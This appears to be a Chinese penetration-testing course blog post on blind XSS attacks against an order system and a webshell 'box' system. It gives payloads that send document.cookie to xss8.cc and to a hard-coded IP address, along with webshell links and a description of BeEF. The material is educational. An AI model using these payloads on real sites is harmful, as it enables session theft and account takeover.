avatar

cindahy

A text-focused Halo theme

  • 首页
  • 文章分类
  • 项目
  • 关于
Home 第26天xss注入之订单及shell箱子反杀记
文章

第26天xss注入之订单及shell箱子反杀记

Posted 2024-11-14 Updated 2025-08- 17
By Administrator
3~5 min read

https://xss8.cc/

https://www.postman.com/downloads/

https://github.com/tennc/webshell

https://pan.baidu.com/s/13H4N1VTBVwd3t8YWpECBFw 提取码xiao

演示案例:

  1. 某营销订单系统XSS盲打平台

思路:用xss获取cookie,用cookie访问网站(身份盗用)

document.cookie,获取cookie的函数

</tExtArEa>'"><sCRiPt sRC=http://xss8.cc/q5v5></sCrIpT> #获取cookie

echo"<script>
window.open('http://39.96.44.170/jieshou.php?c='+document.cookie);
</script>";

<script src="http://39.96.44.170/jieshou.php?c="+document.cookie></script>

postman的使用(获取管理员cookie访问后台)

  1. 某Shell箱子系统XSS盲打_工具

看脚本有没有后门直接抓包

BEFF

BeEF,全称 The Browser Exploitation Framework(浏览器漏洞利用框架),是一个专门用于测试和利用Web浏览器安全漏洞的渗透测试工具。它可以帮助安全研究人员评估目标环境的安全性,特别是通过客户端攻击向量进行的攻击

BeEF的核心功能是能够“钩住”(hook)一个或多个Web浏览器,并使用这些浏览器作为攻击的跳板,对系统进行更深入的攻击和控制。它通常用于信息收集、网络钓鱼、会话劫持等 的核心功能是能够“钩住”(hook)一个或多个Web浏览器,并使用这些浏览器作为攻击的跳板,对系统进行更深入的攻击和控制。它通常用于信息收集、网络钓鱼、会话劫持等

小迪安全web
小迪安全web
License:  CC BY 4.0
Share

Further Reading

Jul 6, 2025

第38天反序列化JAVA

#序列化和反序列化 序列化:将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间, 对象将其当前状态写入到临时或持久性存储区。 反序列化:从存储区中读取数据,并将其还原为对象的过程,称为反序列化。 下方的特征可以作为序列化的标志参考:

Apr 26, 2025

第36天逻辑越权之验证码与Token及接口

#验证码安全 分类:图片,手机或邮箱,语音,视频,操作等 原理;验证生成或验证过程中的逻辑问题 危害:账户权限泄露,短信轰炸,遍历,任意用户操作 漏洞:客户端回显(已讲),验证码复用,,验证码爆破(已讲),绕过等 #token安全 基于上述同理,主要是验证中可存在绕过可继续后续测试 token爆破

Apr 26, 2025

第35天逻辑越权之找回机制及接口安全

#找回重置机制 客户端回显(验证码显示在客户端),Response状态值,验证码爆破,找回流程绕过(抓包跳过验证流程)等 #接口调用乱用 来电轰炸,短信轰炸等 演示案例: 找回密码验证码逻辑-爆破测试-实例 墨者靶场密码重置-验证码套用-靶场 手机号码,新密码和验证码在同一界面, 填写手机号,得

OLDER

第25天XSS跨站之原理分类及攻击手法

NEWER

第27天xxs跨站之代码及httponly绕过

Recently Updated

  • 常见安全产品整理(防火墙,WAF,EDR)
  • ELK从入门到实践
  • bp+mumu模拟器app抓包
  • xray漏扫工具
  • Java反序列化-RMI的几种攻击方式

Trending Tags

安全运营 文件上传 php反序列化 xss csrf ssrf xxe sql php 白帽子讲web安全

Contents

©2025 cindahy. Some rights reserved.

Using the Halo theme Chirpy